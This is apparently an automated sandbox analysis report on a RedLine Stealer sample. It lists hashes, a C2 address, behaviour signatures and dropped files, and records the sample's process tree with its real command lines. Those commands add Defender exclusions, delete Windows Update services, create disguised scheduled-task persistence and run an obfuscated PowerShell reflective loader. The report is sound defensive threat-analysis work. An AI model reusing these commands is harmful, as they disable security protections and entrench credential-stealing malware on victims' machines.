Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    301s
  • max time network
    296s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    01/11/2022, 09:57

General

  • Target

    72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7.exe

  • Size

    2.4MB

  • MD5

    2e741b20a9b1a20eb723e30d8f0ce395

  • SHA1

    7bf2f2a5c210ab1d4b1b70b8541550193924722b

  • SHA256

    72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7

  • SHA512

    f946462ef91f5c2f0486d195e51ea3f7694a68797ee0f1910e2e518de1221023ef003772d9d1f3adf0c7d321435085dde6a3b262c65c953060282167a73dc5b9

  • SSDEEP

    24576:nZAsE+YcYdlNbgwM1/lc+7+F+NalOxkey5mILPKTLfSzvHmh/NeCql3RuQ55313S:esgT+85mILPKTkDl3o

Malware Config

Extracted

Family

redline

C2

62.204.41.141:24758

Attributes
  • auth_value

    3635ab4d86c01914c9036a302ef7c402

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:476
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Suspicious behavior: LoadsDriver
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k NetworkService
        2⤵
          PID:336
        • C:\Windows\System32\spoolsv.exe
          C:\Windows\System32\spoolsv.exe
          2⤵
            PID:480
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs
            2⤵
            • Drops file in System32 directory
            • Suspicious use of AdjustPrivilegeToken
            PID:876
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {915AE9F6-ACB9-4E62-B019-34CBE184F38E} S-1-5-18:NT AUTHORITY\System:Service:
              3⤵
              • Loads dropped DLL
              PID:1980
              • C:\Program Files\Google\Chrome\updater.exe
                "C:\Program Files\Google\Chrome\updater.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Drops file in Program Files directory
                • Suspicious use of AdjustPrivilegeToken
                PID:1048
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                  5⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2956
                • C:\Windows\system32\cmd.exe
                  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  5⤵
                    PID:3088
                    • C:\Windows\system32\sc.exe
                      sc stop UsoSvc
                      6⤵
                      • Launches sc.exe
                      PID:3172
                    • C:\Windows\system32\sc.exe
                      sc stop WaaSMedicSvc
                      6⤵
                      • Launches sc.exe
                      PID:3244
                    • C:\Windows\system32\sc.exe
                      sc stop wuauserv
                      6⤵
                      • Launches sc.exe
                      PID:3316
                    • C:\Windows\system32\sc.exe
                      sc stop bits
                      6⤵
                      • Launches sc.exe
                      PID:3348
                    • C:\Windows\system32\sc.exe
                      sc stop dosvc
                      6⤵
                      • Launches sc.exe
                      PID:3380
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      6⤵
                        PID:3468
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        6⤵
                          PID:3484
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                          6⤵
                            PID:3548
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                            6⤵
                              PID:3560
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                              6⤵
                                PID:3572
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                              5⤵
                              • Drops file in System32 directory
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3116
                              • C:\Windows\system32\schtasks.exe
                                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                6⤵
                                • Creates scheduled task(s)
                                PID:3328
                            • C:\Windows\system32\cmd.exe
                              cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              5⤵
                                PID:3104
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-ac 0
                                  6⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3216
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-dc 0
                                  6⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3232
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-ac 0
                                  6⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3256
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-dc 0
                                  6⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3304
                              • C:\Windows\system32\dialer.exe
                                C:\Windows\system32\dialer.exe xtrjicqmdliu
                                5⤵
                                  PID:3396
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                    6⤵
                                    • Drops file in Program Files directory
                                    PID:3408
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic PATH Win32_VideoController GET Name, VideoProcessor
                                      7⤵
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3444
                                • C:\Windows\system32\cmd.exe
                                  cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                  5⤵
                                  • Drops file in Program Files directory
                                  PID:3432
                                • C:\Windows\system32\dialer.exe
                                  C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
                                  5⤵
                                    PID:3588
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                  4⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Drops file in System32 directory
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2064
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                  4⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Drops file in System32 directory
                                  • Suspicious use of SetThreadContext
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2088
                              • C:\Windows\system32\taskeng.exe
                                taskeng.exe {394A1DCD-81A7-4A0F-B9FF-FBBE54C3251C} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
                                3⤵
                                  PID:2364
                                  • C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
                                    C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2632
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService
                                2⤵
                                  PID:852
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                                  2⤵
                                    PID:804
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                    2⤵
                                      PID:756
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k RPCSS
                                      2⤵
                                        PID:672
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k DcomLaunch
                                        2⤵
                                          PID:596
                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            3⤵
                                            • Checks processor information in registry
                                            PID:3632
                                      • C:\Windows\system32\winlogon.exe
                                        winlogon.exe
                                        1⤵
                                          PID:416
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{74bbd923-9903-41da-a1c7-b1dda15a6af0}
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2244
                                          • C:\Windows\System32\dllhost.exe
                                            C:\Windows\System32\dllhost.exe /Processid:{1a7a46ac-1f8d-4d82-88a3-4c869dec841e}
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2268
                                        • C:\Windows\system32\lsm.exe
                                          C:\Windows\system32\lsm.exe
                                          1⤵
                                            PID:484
                                          • C:\Users\Admin\AppData\Local\Temp\72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7.exe
                                            "C:\Users\Admin\AppData\Local\Temp\72ff620722be23a0319e2590e2833772d0643f96bcedaa576b9b50fbc3c3e8d7.exe"
                                            1⤵
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of WriteProcessMemory
                                            PID:1256
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                              2⤵
                                              • Loads dropped DLL
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:146836
                                              • C:\Users\Admin\AppData\Local\Microsoft\brave.exe
                                                "C:\Users\Admin\AppData\Local\Microsoft\brave.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • Drops file in Program Files directory
                                                • Suspicious use of WriteProcessMemory
                                                PID:147124
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:146856
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                  4⤵
                                                    PID:1688
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop UsoSvc
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:956
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop WaaSMedicSvc
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:1332
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop wuauserv
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:588
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop bits
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:1808
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop dosvc
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:812
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                      5⤵
                                                        PID:632
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                        5⤵
                                                          PID:1612
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                          5⤵
                                                          • Modifies security service
                                                          PID:1304
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                          5⤵
                                                            PID:1972
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                            5⤵
                                                              PID:1668
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                            4⤵
                                                              PID:828
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -hibernate-timeout-ac 0
                                                                5⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:560
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -hibernate-timeout-dc 0
                                                                5⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1536
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -standby-timeout-ac 0
                                                                5⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2004
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -standby-timeout-dc 0
                                                                5⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1300
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:960
                                                              • C:\Windows\system32\schtasks.exe
                                                                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                                5⤵
                                                                • Creates scheduled task(s)
                                                                PID:1272
                                                            • C:\Windows\system32\dialer.exe
                                                              C:\Windows\system32\dialer.exe
                                                              4⤵
                                                              • Drops file in Windows directory
                                                              PID:1124
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:840
                                                              • C:\Windows\system32\schtasks.exe
                                                                "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                                                5⤵
                                                                  PID:1928
                                                            • C:\Users\Admin\AppData\Local\Microsoft\chrome.exe
                                                              "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Windows directory
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:147148
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:147224
                                                              • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
                                                                4⤵
                                                                • Creates scheduled task(s)
                                                                PID:147244
                                                              • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
                                                                4⤵
                                                                • Creates scheduled task(s)
                                                                PID:147356
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 147148 -s 200
                                                                4⤵
                                                                • Loads dropped DLL
                                                                • Program crash
                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                PID:147376
                                                            • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe
                                                              "C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:147172
                                                              • C:\Windows\system32\cmd.exe
                                                                "cmd.exe" /C schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:147316
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                  5⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:147340

                                                        Network

                                                        MITRE ATT&CK Enterprise v6

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Program Files\Google\Chrome\updater.exe

                                                          Filesize

                                                          2.8MB

                                                          MD5

                                                          eb27bb8cfa99d659e4fe023e9002ecd1

                                                          SHA1

                                                          c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                          SHA256

                                                          9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                          SHA512

                                                          ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                        • C:\Program Files\Google\Chrome\updater.exe

                                                          Filesize

                                                          2.8MB

                                                          MD5

                                                          eb27bb8cfa99d659e4fe023e9002ecd1

                                                          SHA1

                                                          c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                          SHA256

                                                          9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                          SHA512

                                                          ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                        • C:\Program Files\Google\Libs\g.log

                                                          Filesize

                                                          198B

                                                          MD5

                                                          37dd19b2be4fa7635ad6a2f3238c4af1

                                                          SHA1

                                                          e5b2c034636b434faee84e82e3bce3a3d3561943

                                                          SHA256

                                                          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

                                                          SHA512

                                                          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

                                                        • C:\Users\Admin\AppData\Local\Microsoft\brave.exe

                                                          Filesize

                                                          2.8MB

                                                          MD5

                                                          9253ed091d81e076a3037e12af3dc871

                                                          SHA1

                                                          ec02829a25b3bf57ad061bbe54180d0c99c76981

                                                          SHA256

                                                          78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

                                                          SHA512

                                                          29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

                                                        • C:\Users\Admin\AppData\Local\Microsoft\brave.exe

                                                          Filesize

                                                          2.8MB

                                                          MD5

                                                          9253ed091d81e076a3037e12af3dc871

                                                          SHA1

                                                          ec02829a25b3bf57ad061bbe54180d0c99c76981

                                                          SHA256

                                                          78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

                                                          SHA512

                                                          29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

                                                        • C:\Users\Admin\AppData\Local\Microsoft\chrome.exe

                                                          Filesize

                                                          6.8MB

                                                          MD5

                                                          73b9004ff373f3b7b2f595541deb5a02

                                                          SHA1

                                                          bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                                          SHA256

                                                          b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                                          SHA512

                                                          908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                                        • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          a169fb1a323c970f7a169b30657112cc

                                                          SHA1

                                                          5347dc5c0fe604f8527e336dd09a522fef0af9db

                                                          SHA256

                                                          97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                                          SHA512

                                                          8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                                        • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          a169fb1a323c970f7a169b30657112cc

                                                          SHA1

                                                          5347dc5c0fe604f8527e336dd09a522fef0af9db

                                                          SHA256

                                                          97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                                          SHA512

                                                          8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                                        • C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          a169fb1a323c970f7a169b30657112cc

                                                          SHA1

                                                          5347dc5c0fe604f8527e336dd09a522fef0af9db

                                                          SHA256

                                                          97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                                          SHA512

                                                          8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

